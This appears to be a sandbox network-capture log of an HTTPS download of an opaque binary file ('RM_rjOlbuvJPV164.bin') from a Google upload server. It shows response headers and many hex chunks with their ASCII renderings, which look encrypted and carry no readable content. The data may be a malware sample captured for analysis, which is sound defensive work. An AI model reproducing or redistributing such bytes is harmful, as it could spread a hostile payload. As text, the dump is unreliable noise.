X-Goog-Meeting-StartSource, X-Goog-Meeting-Token, X-Goog-Meeting-ViewerInfo, X-Client-Data, x-sdm-id-token, X-Sfdc-Authorization, MIME-Version, Content-Transfer-Encoding, X-Earth-Engine-App-ID-Token, X-Earth-Engine-Computation-Profile, X-Earth-Engine-Computation-Profiling, X-Play-Console-Experiments-Override, X-Play-Console-Session-Id, x-alkali-account-key, x-alkali-application-key, x-alkali-auth-apps-namespace, x-alkali-auth-entities-namespace, x-alkali-auth-entity, x-alkali-client-locale, EES-S7E-MODE, cast-device-capabilities, X-Server-Timeout Access-Control-Allow-Methods: GET,OPTIONS Content-Type: application/octet-stream Content-Disposition: attachment;filename="RM_rjOlbuvJPV164.bin";filename*=UTF-8''RM_rjOlbuvJPV164.bin Content-Length: 221760 Date: Wed, 01 Dec 2021 12:26:35 GMT Expires: Wed, 01 Dec 2021 12:26:35 GMT Cache-Control: private, max-age=0 X-Goog-Hash: crc32c=cpkKjA== Server: UploadServer Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000,h3-Q050=":443"; ma=2592000,h3-Q046=":443"; ma=2592000,h3-Q043=":443"; ma=2592000,quic=":443"; ma=2592000; v="46,43" Connection: close
2021-12-01 12:26:35 UTC	6	IN	Data Raw: 44 23 6d 55 8c 6c 8a 4e a7 9a 79 92 3a d9 9c 02 28 39 60 05 1c bf be 03 76 a4 3e f1 42 04 85 78 cb 9f fe e3 32 62 39 40 12 b2 bb 39 c3 6c 2d 3e a5 07 e6 d4 cd b8 c6 f4 b3 ee ba f5 53 14 cc 06 40 54 07 3c 48 ea 8e 32 11 f4 97 05 2c 5c c0 b4 d9 ff da fb 2f 69 9f 25 56 cd bd bf 55 9d d3 9a c3 bf 7b 58 01 86 2b 93 f2 44 68 e1 13 61 1f f5 4b d9 42 6b 16 51 ee a0 ad 12 d6 d9 bb c5 3e 46 a0 fa 5b 0e 2c 00 70 87 8e 3e bc b7 39 0e e0 47 86 c9 e5 c0 02 53 00 a9 5e 53 e4 89 e7 36 7f dc d3 5e 8c 93 b1 5b d6 bf b6 cb 3c d0 7e 17 c7 f7 06 3d 4d 0b 98 70 ec 83 d8 57 f2 bd 62 66 29 fa 7a 85 a9 fb b0 92 88 e5 dd bd 65 72 d6 02 a9 de 97 fb 8b 6b b8 49 4a 42 c9 a4 8c 7d ee d9 80 86 dd d4 97 fd d9 0c b9 db 42 c3 ad 65 43 1e 16 77 77 51 71 53 7f c4 c5 75 8b d6 5b 76 ce 20 88 Data Ascii: D#mUlNy:(9`v>Bx2b9@9l->S@T<H2,\/i%VU{X+DhaKBkQ>F[,p>9GS^S6^[<~=MpWbf)zerkIJB}BeCwwQqSu[v
2021-12-01 12:26:35 UTC	9	IN	Data Raw: fc a3 14 29 55 0a 04 c1 71 cb 45 bb fd 78 fa cb 55 a7 7b 9a f9 57 6d a4 21 31 e3 73 b4 c7 2f c4 18 81 a6 33 55 e9 df 6b 78 04 4b 78 8f e8 ff 5a e3 4d 26 9b 62 25 85 50 4b cc 06 bd c1 07 f6 05 8d 7e cd c6 26 cd 77 26 f6 80 ed cb 60 1b db af 60 74 4c a0 10 dd 17 1c 0c 0a fd 59 39 30 ce 18 43 99 5a f7 f0 54 f6 23 a4 21 f6 45 3b 97 f5 b8 92 5c 94 c5 d4 de 2e 77 9f 76 dd 08 53 2c 89 1e d8 1c c5 9e a4 99 ec c3 95 b8 8a 8f 64 b4 8d bb 2e b5 4d 2a 0a 9f 31 c8 f1 1c 87 0b 17 58 4a e2 19 57 67 da da 3e 23 e6 ef c5 19 23 a5 ab da 47 af 15 07 5b c9 87 63 18 cc 66 48 59 aa 61 cd eb b5 ed 5a ac 53 cd 95 1b 99 19 0c c0 fb 61 01 d3 e4 57 95 75 ea ee ea 1d 6a f8 c1 0b a6 08 d8 27 c0 67 06 ba d0 14 02 c5 a2 e1 7a 7b 04 a0 8a bb d8 1c 7e d3 31 d9 9f 67 3c 1f 12 64 53 ee 63 Data Ascii: )UqExU{Wm!1s/3UkxKxZM&b%PK~&w&``tLY90CZT#!E;\.wvS,d.M*1XJWg>##G[cfHYaZSaWuj'gz{~1g<dSc
2021-12-01 12:26:35 UTC	13	IN	Data Raw: ea 35 69 fb 58 ee b9 09 e8 58 86 52 9e c9 ed 4f 84 a2 96 d9 73 be 38 b5 f5 99 b3 5d c5 36 7f 11 09 c1 6d b1 dc 93 fa c1 3a f0 33 3d bb 6a f7 4c 64 55 9e 09 8e 0b 0e 7e eb b3 b9 e7 1d fd 52 40 53 60 b6 ef 82 5d 0b 24 6c 8c a2 34 8a 63 f6 0f 15 ba c5 c2 da a5 bc ed 74 bd cd 92 70 61 6f 51 a4 6a 42 14 62 6e 84 57 80 3d 0c 97 34 4a ea 8e 3a 15 f4 86 13 d8 88 db b4 66 e8 24 fa 03 6b 87 2e 16 ca ab 41 54 b1 d1 8d c8 bf 7c 40 ff 87 07 91 d9 46 43 02 3b 14 1d f5 4d db 6a f0 16 51 e4 88 db 10 d6 df 13 5e 3e 46 a4 fa eb 8c 73 b4 79 4b 87 1d bd fb fe 30 be a3 b0 ba c5 b1 58 a7 67 db 35 16 b3 e8 86 5e 39 28 a7 7e e4 de e9 2b a3 d7 be 39 52 f0 30 70 b1 d7 6b 58 01 f5 b6 7d eb a1 b9 55 f2 bb 4a fd 29 fa 20 e8 8f fb fc 99 a3 7e 7e 3d 11 0c dc 8e f6 de 97 fa a3 f0 58 49 Data Ascii: 5iXXROs8]6m:3=jLdU~R@S`]$l4ctpaoQjBbnW=4J:f$k.AT\|@FC;MjQ^>FsyK0Xg5^9(~+9R0pkX}UJ) ~~=XI
2021-12-01 12:26:35 UTC	17	IN	Data Raw: 5b 25 56 50 5f 1e bc db 76 a0 77 33 f4 cc e7 17 c7 d3 1e 91 8f d1 ad a9 eb 69 e7 4d 21 37 7e 4f f1 c0 28 bd c2 39 fd 3d 4e e5 8e da f5 65 05 00 e0 78 a4 18 19 ec 32 31 3d 9b ad 57 9a e0 31 12 60 23 3b 39 73 bd c5 2f c8 b0 4e f4 03 4a 2d dd 61 56 2c 61 ee 89 e2 dd 4a 27 4f 2c 43 4a 04 af 50 41 6e 16 d5 d8 2f 30 07 f4 78 ca 4f 0e 51 77 26 fc a8 2b c9 39 1d b1 13 60 7e 46 02 01 9d 3f d7 0c 0a 5a dc 55 20 d4 1e 6b bf 41 c7 ff 3b 2d 22 a4 2b db d3 3b 86 f7 ee d5 5c 94 cb cc c5 eb 75 9e 7a f3 ea 19 2c 83 ea b6 29 cb 9e ae 9b 97 84 1f ba 8a 83 4a 5e ad f5 24 4b 23 07 26 f0 2a c9 ce b4 cb 0b 11 43 45 d5 19 3a 28 dc f2 13 25 ce a9 a8 d4 25 ca f1 fc 56 a2 3b e7 14 cb 81 63 5f af 64 48 55 84 29 9f eb bf 88 9c ab 27 fd b3 0a 9f 5e 96 c2 fb 6d 38 9b ce 65 91 63 c4 e8 Data Ascii: [%VP_vw3iM!7~O(9=Nex21=W1`#;9s/NJ-aV,aJ'O,CJPAn/0xOQw&+9`~F?ZU kA;-"+;\uz,)J^$K#&*CE:(%%V;c_dHU)'^m8ec
2021-12-01 12:26:35 UTC	18	IN	Data Raw: 2a f3 93 6d 4a 99 24 cf d5 f1 81 33 1f b4 b7 f0 ef 5d 51 57 6d 27 b9 ae 5e 16 eb 79 8b dc e2 95 7b 02 61 f0 b8 ee cd fb 70 2c 13 8b ba cd 85 70 61 6f 6e b3 57 6a de 4a 6e 82 7f b9 0d 0e 91 14 63 ea 8e 34 04 f3 f8 d7 d3 a3 ca 9c 45 ff da f1 3b 7f b7 17 16 cd bb 99 88 a7 d2 9a c3 9a 53 6f 01 86 21 80 cf 50 7b e6 3b 59 1f f5 41 04 67 6a 16 51 90 ae ad 12 d2 c1 7b 59 3e 46 ae fe 6c 15 2c b4 78 59 ef 97 fd ed dc e0 b6 2f e9 18 d4 f0 67 42 70 db 3f 3a ec af 84 58 17 9b f0 7c ee f0 fe 51 a3 d1 9c 00 43 b0 22 70 cc d5 6b 54 8b 7f f6 64 c9 f0 fc 57 f8 ae 20 74 6b 84 3c c0 a9 ff d4 e9 8b e5 74 9f 0a 53 cc 2a cf dc 97 fd 29 7a 18 61 33 43 c2 af af 1a ec 81 85 ae f5 dc 97 fb c8 0b d6 09 7c b5 a4 4d 93 3c 16 71 5f 7f 73 53 79 ab fd 75 8b fc 73 1e cc 22 8e a0 ec 23 5f Data Ascii: mJ$3]QWm'^y{ap,paonWjJnc4E;So!P{;YAgjQ{Y>Fl,xY/gBp?:X\|QC"pkTdW tk<tS)za3C\|M<q_sSyus"#_
2021-12-01 12:26:35 UTC	19	IN	Data Raw: 81 ef cb 39 1b 82 3d 60 7e 42 a0 10 dd 3e 15 0c 0a 5f f4 39 22 ce 18 43 99 41 c7 f5 54 d9 2b a4 21 ed 45 3b 86 b1 99 db 5c 98 cf a0 ed 34 77 9e 7d db 20 19 2c db 1d b7 57 cb 9e ae 9f 9b a5 d9 b8 85 85 62 94 b7 f5 2e b4 22 67 0a 9f 54 c7 e6 73 c7 0b 17 52 31 f4 2b 38 27 da da 34 3f ce a3 c6 19 25 ca fb 56 4e a5 13 21 16 cb 87 ff 7e 9d 66 47 53 ac 0e 85 eb b5 e6 51 ab 27 f7 3c 12 98 76 51 c0 fb 6b 9e 94 e6 57 9c 63 c2 c0 f0 1d 60 ef 81 80 a6 08 1e 29 af 33 08 ba da 18 d1 a3 fa e1 75 71 b3 b7 46 36 f3 1d 7e d2 3c da 64 76 4f 46 1c 64 59 fd 96 47 9b 70 2c cc 8e ef 7a c8 ad b1 69 4b ff ed 10 e1 a3 0e c0 da 6f 61 35 89 9b 34 33 0a 67 24 3f 09 93 43 cd 35 be 73 10 3c 24 29 fb 66 25 e2 e6 ab c8 f1 ce db a0 ba e6 4d 63 21 56 08 e7 32 24 98 9f e3 c4 42 21 3d 52 3f Data Ascii: 9=`~B>_9"CAT+!E;\4w} ,Wb."gTsR1+8'4?%VN!~fGSQ'<vQkWc`)3uqF6~<dvOFdYGp,ziKoa543g$?C5s<$)f%Mc!V2$B!=R?
2021-12-01 12:26:35 UTC	20	IN	Data Raw: 81 32 6d f3 68 6e e2 05 4f 04 ef 40 d9 45 71 e8 50 c2 ab af 7d 1f d9 3b cf 28 75 6a fe ea 00 2b af 87 4b 83 8e 95 d5 f6 2f b2 05 f3 b1 c5 b7 66 c2 66 f7 3d 29 cf ea 81 46 ef b2 8b 7c c5 f3 a9 55 5c 2e 69 a4 78 f0 3a 58 87 e7 69 52 b0 6e b6 7d c6 89 fc 46 e4 ae 66 5e a9 fa 2a c0 a9 ea f8 84 75 e4 52 3e 03 00 d2 02 b8 da 8f 05 8a 47 51 61 7b 43 c2 af 8a 64 fd 85 83 97 d9 c0 69 fc f5 1d be b4 11 b5 ae 6f 41 51 e6 77 77 5b 5d 00 62 d7 81 75 9a f2 40 88 cf 0e 8f 81 98 b9 54 39 08 a6 31 c6 8d 40 45 c8 de 08 b2 2f aa 13 b2 e2 bb db 12 32 59 23 20 e7 d3 d4 b1 aa 07 99 b0 e7 af fb e7 dd 6e 06 ae bb c3 f8 e1 18 e4 b4 61 f7 e3 c2 97 12 1d 39 07 12 62 02 4a 62 95 b3 77 fa a5 0e fc 8d cc 35 fe ab 08 ee 0f 65 62 30 9d 81 bc 19 a8 cd 3e 05 cd 4c 19 40 9b 95 83 f5 11 73 Data Ascii: 2mhnO@EqP};(uj+K/ff=)F\|U\.ix:XiRn}Ff^*uR>GQa{CdioAQww[]bu@T91@E/2Y# na9bJbw5eb0>L@s
2021-12-01 12:26:35 UTC	22	IN	Data Raw: 1d 87 d5 f7 d6 47 ad 0f d1 17 e7 94 63 5f 59 64 48 55 84 e7 9d eb b3 88 29 ab 27 fd 9f 06 94 76 57 d8 05 6a 05 8f ce 53 93 63 c4 af 17 1d 60 e4 ee 7e a6 08 d2 2a b6 3f 06 b2 cd e6 04 86 f8 f9 76 71 bb aa a2 37 df 0d 78 fa 12 d8 87 79 59 6e 3c 64 59 f7 71 60 d1 6e 2f cc 86 f0 71 36 ac 9c 67 4c d7 96 10 eb a9 8e c6 da 6f 65 24 91 97 34 34 10 99 25 09 1a 95 6a 28 37 be 75 25 d0 26 29 f3 09 5d e2 cd ab c2 ea cd db a8 ac 02 4c 4f 22 41 04 e7 3a 01 80 61 e2 e6 40 0a 38 22 46 8e 5c de f1 7e ba e1 1f 3b 42 55 7c 99 98 29 a9 c8 9e 1b 17 50 e8 fe 39 cd 40 a0 8d 15 a9 81 52 66 0a 1c 97 f5 1c 87 a0 37 60 4e e4 01 d4 36 fa 65 8a e6 5b b4 e5 a9 63 a1 13 9d 13 85 20 38 b7 fb 65 f5 da 84 4d ea 25 45 f0 4e 10 b2 0d e3 27 9b 58 97 43 76 de 23 a6 80 cb 78 be 38 c3 0a 99 9f Data Ascii: Gc_YdHU)'vWjSc`~*?vq7xyYn<dYq`n/q6gLoe$44%j(7u%&)]LO"A:a@8"F\~;BU\|)P9@Rf7`N6e[c 8eM%EN'XCv#x8
2021-12-01 12:26:35 UTC	23	IN	Data Raw: 9a f3 6d 39 23 9c d6 02 a9 de 86 ff 9c 95 59 65 4b 5b d1 a1 87 6c ea 9d 7d 87 f1 d9 80 d7 c4 1f bd db 6d b1 b6 9b 42 12 05 09 55 51 71 57 57 3b 85 75 81 99 36 76 ce 28 82 91 83 27 5f 34 1f b8 cf d6 a5 5f 90 92 e9 1e 9d 14 a0 04 ad 1c ab f3 10 ca 37 08 24 f1 d5 b0 87 ae 07 8c bc 60 47 d2 e5 d8 79 26 a6 56 c6 d4 c4 00 e1 4e 60 ca e4 cc 7a 17 31 27 15 72 b9 03 66 64 30 01 58 5b 57 fd 19 96 df e3 e3 a7 17 9e b9 7b cf 31 a4 85 bc 08 b7 e0 c4 04 66 4c 32 45 8b f9 7c 1b c6 a2 29 8f 29 58 71 a4 b2 aa fb 36 2b 6c 03 f0 dd 61 38 ac d1 31 97 a7 03 87 e1 ed 73 6c d8 01 37 7f 58 cf f5 68 ab ee d1 c1 43 6b ed a6 1a e0 56 1b 56 e2 78 a4 16 35 4a 64 17 39 77 e5 57 9c f7 15 3f 79 72 3c 3f 5b b1 db 51 e1 12 5f b0 03 51 ff a1 44 50 2a 4d f6 3e f4 e6 6e cb 06 2c 45 64 0e aa Data Ascii: m9#YeK[l}mBUQqWW;u6v('_4_7$`Gy&VN`z1'rfd0X[W{1fL2E\|))Xq6+la81sl7XhCkVVx5Jd9wW?yr<?[Q_QDP*M>n,Ed
2021-12-01 12:26:35 UTC	24	IN	Data Raw: 4b fb c5 1a e8 a3 08 e6 fe 6f 61 31 03 93 34 3c 0e ba 2d 26 09 93 40 d2 42 8d 6a 73 3e 24 29 f1 4e 2e e1 cd a7 e0 d5 c1 db aa 3a f4 4d 63 24 8b e3 e5 32 1e 90 80 9b f9 5b 5f 35 1a 35 74 8b 2d d8 7e bc c9 20 0b 46 5f 37 91 98 29 87 15 53 08 15 78 15 e1 40 f4 36 ea 85 15 a3 ea 4f 6b 09 16 9b 00 8b 87 a0 3d c5 6e d3 01 d0 e1 59 65 a2 19 59 ab 95 89 7e ff 1b 99 13 81 85 4d b4 fb 62 d0 2e f8 4d e0 a4 65 e4 4e 14 65 b4 e1 26 9b 50 81 b6 f2 1f e5 bd 85 dd 77 87 33 af 0b 9e b7 72 cc 20 5d fc 03 c1 6b 17 1b f3 fc c1 2b f6 33 0d 76 72 a5 4a 6d 4a 97 36 fc 29 0e 78 c5 35 a6 f6 04 79 5a 51 57 72 95 bb ac 5e 1c 1f 6c 8c b3 36 fa 72 09 0e 33 d7 e5 c6 e2 44 69 16 8b ba b5 e4 79 60 6b 73 ef 60 43 1e 42 78 7a 56 cc 0f 11 85 c2 4a fc 70 33 4a f6 b7 a1 d3 a3 c0 4a 60 e9 24 Data Ascii: Koa14<-&@Bjs>$)N.:Mc$2[_55t-~ F_7)Sx@6Ok=nYeY~Mb.MeNe&Pw3r ]k+3vrJmJ6)x5yZQWr^l6r3Diy`ks`CBxzVJp3JJ`$
2021-12-01 12:26:35 UTC	26	IN	Data Raw: d2 6a 36 af 90 d4 e3 f0 0d e9 55 79 25 e1 f9 8e 07 16 32 d5 1f 97 1c 7c 73 a5 b6 5e 9a 45 fc fd 84 f7 ed f0 b2 0a 48 a9 56 cc 2c a4 8b a3 17 a0 e6 3a 14 51 51 29 be b2 b9 92 f5 3f bd e4 4e f3 dd 53 95 1e bd c2 33 34 46 20 ef dd f3 24 b3 c6 e0 96 8b 18 be a2 f7 a5 79 53 3e 2f 6c 47 b1 c0 73 b4 c7 03 fe 11 43 fc ad 0f ef b3 10 23 d8 56 b7 09 bb ec 69 39 31 a1 ae 7b 88 d9 2d 3b a4 2b 39 2e 50 8b c1 40 d4 13 5f be 16 7d cc cc 7a 50 3b 52 67 aa 1c d6 4e e9 5c 27 5f b4 30 a4 4f 6f df 1c 95 d0 1c eb 25 0a 7f f7 5c 0e d2 76 26 fc 82 fe c0 28 15 f6 22 61 7e 46 b3 1d c2 36 0f 17 0a 41 ef 26 2e 2a 19 6f 92 50 cc ef 82 f2 29 bb 2c f0 5e 3b 97 ec 8f f5 a2 95 e3 ae ef 3f 7c b6 6e da 20 13 3f 8f 0b 98 44 de 9e bf 84 e4 8e 27 b9 a6 8b 60 85 a6 dd 3c b4 22 6d 19 9b 24 ed Data Ascii: j6Uy%2\|s^EHV,:QQ)?NS34F $yS>/lGsC#Vi91{-;+9.P@_}zP;RgN\'_0Oo%\v&("a~F6A&.*oP),^;?\|n ?D'`<"m$
2021-12-01 12:26:35 UTC	27	IN	Data Raw: 29 af 8d b3 26 54 69 c9 d7 c7 33 e7 76 b5 c3 4c 62 62 91 67 81 12 8a 03 87 bc 4c a6 eb 72 e9 1b d0 5e eb 24 67 f5 41 01 a9 f3 f0 29 99 43 91 e5 d3 07 9b bf 96 d3 62 a0 26 bd 05 4e 49 45 c3 22 46 73 23 d3 6a 13 cc 8c ef ce 31 22 3f 22 47 7a d4 6a 7f 4b 93 14 ab 3a 01 64 3b 02 a9 f4 1f f6 7a 43 56 76 42 fd a3 4f 13 2d 79 81 65 e6 86 74 0a 1f 36 90 fc c6 e2 44 52 17 9a b5 a9 5d 63 6e 7a 7c 97 b0 55 c8 c5 45 84 57 92 1e 0a 95 2d 44 fb 8a 24 04 f1 bf 16 d2 a3 ca b7 70 f3 b5 e7 2e 69 95 1c 3a cc bd bf 5d bd dd 1a c3 bf 3b c7 01 86 2b 90 e3 48 07 fc 12 61 15 9a 55 d8 42 61 3e 03 ee a0 ab 01 c2 c8 2f d4 2e 4e 86 b5 e1 00 2a a7 6b 4d c3 a5 bd fb f4 2f b4 2f cf fa 9e 93 70 3c 67 db 3f 3e 34 d5 df 70 80 b3 a7 74 59 e1 47 a4 88 d1 96 a3 41 e3 2b 4a 85 c4 6c 3e 0a 6e Data Ascii: )&Ti3vLbbgLr^$gA)Cb&NIE"Fs#j1"?"GzjK:d;zCVvBO-yet6DR]cnz\|UEW-D$p.i:];+HaUBa>/.N*kM//p<g?>4ptYGA+Jl>n
2021-12-01 12:26:35 UTC	28	IN	Data Raw: ba e0 92 cd 3c 48 e7 b5 1a df 70 02 28 cd 7a cb 8a bb fd 78 35 10 77 ba 56 9c fb 29 3e cb b9 3b 3f 51 89 c3 3e c4 06 77 35 19 62 ef c9 ec 57 2a 49 79 9d f6 c3 4a 40 4d 2c 4f 7a af 90 50 4b cd 2f a6 c0 07 fe 12 78 41 db 49 27 ef c7 26 f6 8a c7 91 39 1b 93 23 b6 f3 67 a0 10 dc 04 1b 1d 0c 44 dc 20 21 d4 1e 5b 15 46 c7 f5 55 f2 29 b5 2a f5 54 3c 24 e6 9b cc 4a 18 f0 a0 ed 2f d5 8f 77 c8 2c 08 20 9d 00 af da ea 9e ae 9e e8 a1 c8 b5 9c 92 fe 85 a0 e2 38 29 33 6a 1d b7 9c ce e6 79 ef 1a 1a 44 dc d1 34 29 24 cc 40 1c 34 ce a3 cd c9 37 ca fb c1 6f b1 13 2f 1c e3 b3 64 77 97 12 5a 53 ac 15 8c ec a4 e0 40 ac a9 40 8d c1 8e ea 2c e5 fa 6b 23 8e ee 46 9b 77 ea da e9 1d 66 f9 0c 87 a6 08 d9 33 a3 22 0a ac cb 1d 2d bb fa e1 70 d3 a2 bb 4f 3d e2 17 6a c6 2b 57 a8 7f 4f Data Ascii: <Hp(zx5wV)>;?Q>w5bWIyJ@M,OzPK/xAI'&9#gD ![FU)T<$J/w, 8)3jyD4)$@47o/dwZS@@,k#Fwf3"-pO=j+WO
2021-12-01 12:26:35 UTC	29	IN	Data Raw: 51 5e 56 41 6e ae 5e 5c f1 68 8c b3 43 b3 7a 08 04 2a 9a f0 4a c9 4e 41 13 98 99 ac 93 fd 4a 6b 79 81 79 66 0f 4d 71 9c 46 b0 1b 10 bf 2f 4a ea 84 23 10 e2 86 21 c5 bc d8 9c 72 fe da f1 3e 4b 8e 01 79 ea bc bf 5f 8c f1 8b e0 d0 53 59 01 8c 3a b1 e5 2b 41 e0 13 6b 0e d7 52 b6 68 6a 16 5b ff 82 c2 39 d7 d9 31 d4 3a 50 bf e1 6f b7 43 98 78 4a a5 95 98 e4 b4 a2 9f 2f ef bb d6 91 61 19 78 f3 2e 1f d2 f5 c6 70 02 b2 a7 74 9d d3 90 29 a9 c2 b0 b3 74 e1 1b 37 b6 d6 6b 58 3a 49 a7 5a c9 9d fd 57 f8 95 35 64 29 fc 02 ee ab fb fa fc f3 e5 7e 37 08 3b d1 13 af cf bf 94 b1 6a 58 43 96 4f d3 83 ab 7a ff a7 ec d1 dd dc 9d 21 de 06 67 c2 7b bf 70 70 44 34 c8 66 52 79 46 53 7f ce 96 5c a3 ce 5b 76 c4 fc 88 8f ba 25 75 64 67 a2 31 d5 89 5a bb 7d f2 0d 99 35 b1 00 b6 37 aa Data Ascii: Q^VAn^\hCz*JNAJkyyfMqF/J#!r>Ky_SY:+AkRhj[91:PoCxJ/ax.pt)t7kX:IZW5d)~7;jXCOz!g{ppD4fRyFS\[v%udg1Z}57
2021-12-01 12:26:35 UTC	31	IN	Data Raw: 68 28 2e ce 0e df 89 4d d0 dd f3 e1 22 ae 07 fc 48 28 89 f7 81 d4 47 6a ce 8c 90 3a a7 1f 7c db 21 31 38 89 14 bd 7f d9 9d ae 99 e0 21 de b8 8a 84 71 9e bc ff 38 b2 0a 76 0a 9f 31 6c f7 79 de 14 33 de 73 fd 2b 39 8a cb d0 2c 34 c9 01 d6 13 3c dc 77 e5 47 a5 12 8d 07 c1 9d 7a 67 11 59 48 53 ad ac 8e e1 a6 ec 40 a0 33 e3 8e 96 b7 76 5f c1 e8 67 38 91 f0 40 0f 72 ce d7 fc 81 71 e2 99 97 3a 19 d4 39 b9 af 17 b6 c0 0e 99 bb f6 f6 52 d6 b3 b7 56 10 ef 0f 71 d2 2d d5 90 81 4e 6a 11 7c 4a f2 67 5f 94 6f 29 32 8f c3 6d da ab a1 6e 63 e5 ec 10 e1 bc 05 dd d5 6f 70 34 9c 89 ca 3d 26 4d 35 20 13 1f 7d cd 35 bf 5b bd 36 24 23 e2 ea 1a e2 cd a0 e0 41 c1 db aa 92 a6 4d 63 2a 41 de 6a 19 1e 92 9e f0 ce 5d 32 2e 15 35 61 ac 3e cd 80 bb cd 09 1a 4a 4d 27 a0 64 d5 7c 37 81 Data Ascii: h(.M"H(Gj:\|!18!q8v1ly3s+9,4<wGzgYHS@3v_g8@rq:9RVq-Nj\|Jg_o)2mncop4=&M5 }5[6$#AMc*Aj]2.5a>JM'd\|7
2021-12-01 12:26:35 UTC	32	IN	Data Raw: a1 81 17 d1 f5 0f d8 33 46 a7 fe 1f 01 00 be 7b 4f e5 17 a2 f1 c7 08 a8 22 ef b3 d2 4e 71 10 65 c3 32 3e cd fc 78 59 3d b1 b0 73 ee ff 8e 20 5d d0 ba a0 79 f5 02 26 6b 28 94 45 22 45 bc 7f e4 c3 6d 48 ff 93 60 70 22 ff 0f 8a be 2d a8 96 c1 ed 4f 81 0d 39 c5 32 ab de aa fb 8b 6b 1b 49 48 52 d4 a9 ac 52 ee 89 9b 78 dc f0 9a 83 ee 0c b9 df 0f fe af 65 49 35 0f 7b 77 59 66 ad 7e e8 87 6d 87 f6 53 60 30 23 a4 8a 87 2f 5f 2d 02 5c 30 fb 8b 71 b9 e2 3d 0a 9b 7b fd 01 b6 e8 80 df 0b cc 4b 3f 27 f1 8a ce a2 ae 43 88 b4 eb 47 f6 e0 95 79 24 a8 56 c6 d4 fc 1e e0 4b 48 96 e1 d5 8e 3b 09 31 0f 0c 94 1a 98 61 92 b2 56 ab 40 fd 03 8d c1 1d f3 8f 0c 67 d7 19 cd 26 bd 99 8f 38 a4 d7 21 09 4a 46 0e be b2 b9 81 fc 35 aa 36 4f db 51 54 97 09 b0 d1 3e 30 89 32 d8 df c9 3d 87 Data Ascii: 3F{O"Nqe2>xY=s ]y&k(E"EmH`p"-O92kIHRRxeI5{wYf~mS`0#/_-\0q={K?'CGy$VKH;1aV@g&8!JF56OQT>02=
2021-12-01 12:26:35 UTC	33	IN	Data Raw: bd 0a 89 ed a2 f6 55 25 90 df 86 1a 98 7c 74 cb d3 45 2b 9d e0 24 c5 62 c2 ca 90 01 67 38 96 5a b1 de 55 0b af 33 07 b7 d3 0e 1e 36 f3 f6 78 c5 2f be 45 35 47 80 78 c4 35 c0 80 57 5c 47 12 6e 50 f4 e9 f9 83 aa 26 a0 ad ef 60 c8 ad b0 69 3b bf b6 38 7a a3 0e c4 6e f3 68 32 0d 2c 23 e6 0f 47 24 24 09 93 1f 79 a9 b7 59 0d 36 24 3a c5 63 25 6b cd a1 c8 b9 c1 db b1 92 6b 4d 63 2a 54 67 7f 32 1e 98 92 ea 44 f5 01 c2 1a 35 70 92 2a f3 5f b9 e1 02 78 11 54 b7 93 e2 01 14 c8 9e 00 16 17 8f fe 39 cd 23 9c 03 a2 83 11 67 66 0a 27 96 00 8e 84 a0 31 36 31 d2 01 de 46 ef 6e 2c ae 8d bc 61 0d b1 96 c9 8e c5 08 86 43 b7 fa 6e fe 1c ef d1 ec 33 64 6a f9 a4 24 2c f5 20 83 5b 10 7a e9 15 9a b5 8f db 6b a6 b2 1b dd 90 11 e1 78 bc 5f 6a 0d d8 62 9d 71 56 f6 4f 9c dc 3f 2c 45 Data Ascii: U%\|tE+$bg8ZU36x/E5Gx5W\GnP&`i;8znh2,#G$$yY6$:c%kkMcTg2D5p_xT9#gf'161Fn,aCn3dj$, [zkx_jbqVO?,E
2021-12-01 12:26:35 UTC	34	IN	Data Raw: 2c 0f 0a 56 f8 37 27 bb 44 42 98 4b a8 a8 55 e1 28 b7 35 c8 0c 2a 92 98 52 db 5c 9e e7 3c ed 2e 7d 8d 70 ca 26 1e 3a 8e 9a 00 38 6c 9e ae 95 f3 bd d5 b6 8f 94 6e fb f3 f4 2e bf 0a 38 0b 9f 31 dd ec 5b 5e 0b 17 58 5d f7 44 a0 28 da d0 27 2e df a5 d6 12 33 db f0 54 f0 ca ba 2f 16 c1 96 71 18 5a 66 48 59 81 a0 41 fd a4 f3 24 90 27 f7 94 37 94 67 4b b5 c0 6b 29 9c 89 00 93 63 c8 1c fb 1b 67 f8 86 0e 11 67 71 20 af 39 2e 8b d9 18 03 b9 ff f0 7f 74 b0 b9 58 1e 93 1d 7e d8 31 f2 10 7f 4f 4c 1b 0b c1 fd 67 44 88 74 32 ca 9f eb 76 d9 a9 3e de 24 56 ed 10 e1 b2 08 ca cc 6b ef 8c ec 32 34 3c 00 4f 7f 24 09 99 6a e0 36 be 75 0b 1e 16 2a f5 60 0d c5 cd a1 c2 9e 59 db a0 b0 ef 4a 72 26 47 0f f1 23 19 1c 28 8c 63 42 21 37 0b 33 1f de 21 db 74 ae f2 0d 1a 4e 3a e5 99 98 Data Ascii: ,V7'DBKU(5R\<.}p&:8ln.81[^X]D('.3T/qZfHYA$'7gKk)cggq 9.tX~1OLgDt2v>$Vk24<O$j6u`YJr&G#(cB!73!tN:
2021-12-01 12:26:35 UTC	35	IN	Data Raw: 61 05 55 ff a5 c2 39 d7 d9 31 d6 39 57 a9 f4 e5 16 3d b0 f7 fd c0 aa bc fb fe 24 6a 35 fe bf aa d4 71 3c 6d d2 50 5b c5 ea 8c 84 cf b9 ae 52 e8 ff fe 7e a3 d1 9c 7e 5a f7 55 40 95 d7 61 78 29 6e b7 61 e1 89 fe 57 cc bd 78 3e 29 f4 2a c0 a9 fb fe 93 85 e5 24 55 1b 19 d6 02 a9 de 8c cb 8f 6b df 49 48 43 8f a5 87 6c fa 8a f0 e7 dc dc 9d f1 aa 6e b8 db 76 b8 a7 6d 4b 3a 79 6f 76 51 7b 3c e7 c4 85 7f e4 d4 5a 76 c4 31 8e fb b6 22 5f 2f 08 a7 20 d2 98 5c d4 ee f3 0d 93 05 b4 18 d9 cb ab df 01 dd 5d 17 4a db de ce a8 ad 2f ee b5 fa 5b e9 cf c9 7c 43 9b a9 c7 f2 e3 1b e3 4d 71 df f6 c4 80 98 aa 47 2f 0d 9c 09 6d be a4 a7 4a ee 3e f0 03 8f d2 8c 97 a2 01 6a 64 89 c6 2f 9b 87 b5 76 e4 fd 3a 0f 96 46 1e 2f ab 94 83 ee 13 aa 3f 45 25 50 7a 95 55 bc cb 53 2b 79 33 f4 Data Ascii: aU919W=$j5q<mP[R~~ZU@ax)naWx>)*$UkIHClnvmK:yovQ{<Zv1"_/ \]J/[\|CMqG/mJ>jd/v:F/?E%PzUS+y3
